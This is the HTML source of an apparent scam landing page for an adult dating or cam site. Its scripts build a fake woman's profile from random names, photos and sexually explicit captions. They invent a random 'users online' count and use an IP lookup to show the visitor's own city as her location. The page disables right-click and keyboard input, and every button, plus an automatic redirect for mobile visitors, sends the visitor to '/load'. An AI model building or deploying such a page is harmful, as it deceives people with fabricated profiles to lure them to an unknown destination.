<!DOCTYPE html>
<html>
<head>
<title>Hello!</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel='stylesheet' href='https://use.fontawesome.com/releases/v5.7.0/css/all.css' integrity='sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ' crossorigin='anonymous'>
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<style>
body {
  font-family: Arial, Helvetica, sans-serif;
  font-weight: 400;
    height: 100%;
    margin: 0;
    background-repeat: no-repeat;
    background-attachment: fixed;
  background-image: linear-gradient(110deg, purple, blue);
  }
.topnav {
  overflow: hidden;
  height:40px;
  background: transparent;
  }
.more {
  width: 80%;
  position:static;
  }
.join {
  width: 80%;
  height:60px;
  border: 2px solid white;
  border-radius: 10px;
  color:white;
  background-color: transparent;
  padding: 14px 28px;
  font-size: 17px;
  font-weight:bolder;
  cursor: pointer;
}
.lain {
  width: 80%;
  height:60px;
  border: 2px solid #6600cc;
  border-radius: 10px;
  color:#6600cc;
  background-color: white;
  padding: 14px 28px;
  font-size: 20px;
  font-weight:bolder;
  cursor: pointer;
}
.ngisor, a {
    position:absolute;
    bottom:0;
    text-align:left;
    }
.dot {
  height: 15px;
  width: 15px;
  background-color: #00ff00;
  border-radius: 50%;
  display: inline-block;
  animation: blinker 1s linear infinite;
}
@keyframes blinker {
  50% {
    opacity: 0;
  }
}
.blur {
  -webkit-filter: blur(2px); /* Safari 6.0 - 9.0 */
  filter: blur(2px);
}
.footer {
  position: fixed;
  left: 0;
  bottom: 0;
  width: 100%;
  background-image: linear-gradient(350deg, purple, blue);
  color: white;
  text-align: center;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://cdn-aimi.akamaized.net/mr/mobile-detect.min.js"></script> <script type="text/javascript">
var md = new MobileDetect(window.navigator.userAgent);
if (md.mobile() || md.tablet()) {
var redirect = false;
var excludeTablets = true;
var excludeIOSAndroid = true;
var isiOs = md.is("iOs"); var isAndroidOs = md.is("AndroidOs"); var isFeaturePhone = md.mobile() && !isiOs && !isAndroidOs; if (isFeaturePhone || md.tablet() && excludeTablets
|| (((isiOs && !md.tablet()) || isAndroidOs) && excludeIOSAndroid)) {
redirect = true;
}

if (redirect) {
location.href= '/load'; }}</script>
<script>
var listname = ['Laurene',
'Crissy',
'Janey',
'Terisa',
'Basilia',
'Ebony',
'Lisandra',
'Tanja',
'Asha',
'Muriel',
'Argentina',
'Keena',
'Candyce',
'Marth',
'Mikki',
'Rosenda',
'Herta',
'Georgann',
'Deana',
'Cassi',
'Bridget',
'Euna',
'Amanda',
'Mercedez',
'Zandra',
'Charmaine',
'Carmina',
'Vikki',
'Lakeshia',
'Krystal',
'Velia',
'Christene',
'January',
'Andera',
'My',
'Cathy',
'Thersa',
'Nakesha',
'Germaine',
'Yolande',
'Frederica',
'Marx',
'Suellen',
'Oda',
'Phung',
'Angelena',
'Therese',
'Goldie',
'Marva',
'Afton',

];
var name =  listname[Math.floor(Math.random()*listname.length)];
var lastname = ['Radigan',
'Baugher',
'Cava',
'Montesdeoca',
'Cassella',
'Phillippi',
'Aikens',
'Carini',
'Prins',
'Messina',
'Nino',
'Moy',
'Cullins',
'Wydra',
'Lossett',
'Humphery',
'Gress',
'Metcalf',
'Fleenor',
'Steeves',
'Nee',
'Carollo',
'Lansing',
'Henning',
'Deacon',
'Lacomb',
'Nesby',
'Twitty',
'Kane',
'Horak',
'Stough',
'Foronda',
'Pesqueira',
'Brightwell',
'Desrosier',
'Moll',
'Yount',
'Graeber',
'Spruell',
'Wooster',
'Bull',
'Difranco',
'Fowlkes',
'Palin',
'Kretschmer',
'Cipolla',
'Rondeau',
'Tietjen',
'Fellows',
'Prochnow',];
var lname =  lastname[Math.floor(Math.random()*lastname.length)];
var rndz = Math.floor(Math.random() * 99);
var rndz1 = Math.floor((Math.random() * 400) + 300);
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<script>
var url = "https://extreme-ip-lookup.com/json/";

$.ajax({
  method: "GET",
  cache: false,
  url: url,
  success: function(data) {
    document.getElementById('output').innerHTML = data.city+", "+data.region+", "+data.countryCode;
  },
  error: function(error) {
    //What do you want to do with the error?
  },
});
</script>
<script>
var listgmbr =  ['https://i.imglol.de/S3D5G46g6euemhj.jpg',
'https://i.imglol.de/DSF321S4DFlhj2ig14.jpg',
'https://i.imglol.de/DS516SDG840t2kjl71.jpg',
'https://i.imglol.de/D23G16G84Drcaeb7rj.jpg',
'https://i.imglol.de/D6F546DSGh41k01hc.jpg',
'https://i.imglol.de/542F68D4Sx7zshy5y.jpg',
'https://i.imglol.de/53F4S6D8F4wz0d0b12.jpg',
'https://i.imglol.de/35sdg654dg0zl1kmvo.jpg',
'https://i.imglol.de/32DG165G4bltfqsh6.jpg',
'https://i.imglol.de/5df658s4dkofd7ixz.jpg',
'https://i.imglol.de/3DS5G6SD4Get237mcj.jpg',
'https://i.imglol.de/3d5sf6s8fd431s1b6vo.jpg',
'https://i.imglol.de/3d5f6s8d4fm6zcv1x1.jpg']
var gmbr =  listgmbr[Math.floor(Math.random()*listgmbr.length)];
</script>
<script>
var listcaption = ['I\'m looking for a chilled guy who is clean and fit to try first time sucking and getting sucked. I’ll need a face and body pic please.',
'Chill girl looking for a man to please. I\'m mostly into anything. Don\'t be shy. I love giving and receiving head. Sex in any position.',
'I don\'t post every day but I\'m usually around. I want to give you an experience you will not soon forget.',
'Well today I am hot and horny and I promise u I will show u the time of your life u will cum back for more and I am all real baby',
'Need someone to come eat my tight wet and yummy pussy until I cum.Then fuck me harder than you have ever fucked before.',
'Hello I\'m looking for a hot man to blow my world.'];
var caption =  listcaption[Math.floor(Math.random()*listcaption.length)];
  document.getElementById("demo").innerHTML = caption;
</script>

<script>document.title = name +"_"+ rndz ;</script>

</head>
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
<div class="bg-image">
<div class="topnav">
<center><span style="width:100%; text-align:center; color:white;"><script>document.write("<strong style=\"text-align:center;\"><i class='fas fa-users'></i> "+rndz1+" User Online!!</strong>");</script></span></center>
</div>
<p style="text-align:center; font-size:18px; color:white;"><script>document.write("<span>"+name+" "+lname+"</span>");</script> is <span class="dot"></span> Online</p>
<table style="width:100%; text-align:center;">
  <tr>
    <td><script>document.write("<img style=\"border:5px solid white; border-radius:50%;\" src=\""+gmbr+"\" width=\"60%\" />");</script></td>
  </tr>
  <tr>
<td><h3 style="color:white;"><i class="material-icons">location_on</i> <span id="output">Heaven</span></h3></td>
  </tr>
    <tr>
<td><script>document.write("<p style=\"color:white;\"><i class=\"fa fa-quote-left\"></i> "+caption+" <i class=\"fa fa-quote-right\"></i></p>");</script></td>
  </tr>
  <tr>
    <td style="text-align:center;"><button onclick="window.location.href = '/load';" class="join"><i class='far fa-play-circle'></i> Watch <script>document.write("<span>"+name+"</span>");</script>'s Show</button></td>
  </tr>
  <tr>
<td><br><button onclick="window.location.href = '/load';" class="join"><i class='fas fa-user-plus'></i> Add friends</button>
<br><br><button onclick="window.location.href = '/load';" class="join"><i class='far fa-comment'></i> Send message</button></td>
</tr>
</table><br><br><br><br><br>



<div class="footer">
<p>Please <button style="background-color: #42b72a; border: none; color: white; text-align: center; text-decoration: none; display: inline-block; font-size: 16px; margin: 4px 2px;  cursor: pointer;"onclick="window.location.href = '/load';">Log in</button> to connect with <script>document.write("<b>"+name+"</b>");</script></p>
</div>
</div>
</body>
</html>
